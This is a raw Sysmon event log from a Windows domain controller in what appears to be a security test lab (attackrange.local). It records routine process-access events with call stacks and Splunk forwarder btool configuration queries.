12:01:02.799{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.799{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.799{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.799{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.799{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.799{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.799{266CAFBE-647C-6064-2C00-00000000AE01}2916NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.783{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.721{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.721{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.721{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.643{266CAFBE-646A-6064-0B00-00000000AE01}8564048C:\Windows\system32\lsass.exe{266CAFBE-6467-6064-0100-00000000AE01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+7259e|C:\Windows\system32\lsass.exe+3907|C:\Windows\SYSTEM32\ntdll.dll+80974|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.643{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-4700-00000000AE01}4020C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.643{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-4700-00000000AE01}4020C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.643{266CAFBE-647E-6064-4600-00000000AE01}40004004C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-647E-6064-4700-00000000AE01}4020C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.648{266CAFBE-647E-6064-4700-00000000AE01}4020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-647E-6064-4600-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000002121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.643{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-4600-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.627{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-647E-6064-4600-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.627{266CAFBE-647E-6064-4500-00000000AE01}39883992C:\Windows\system32\cmd.exe{266CAFBE-647E-6064-4600-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.641{266CAFBE-647E-6064-4600-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-647E-6064-4500-00000000AE01}3988C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000002117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.627{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647E-6064-4500-00000000AE01}3988C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 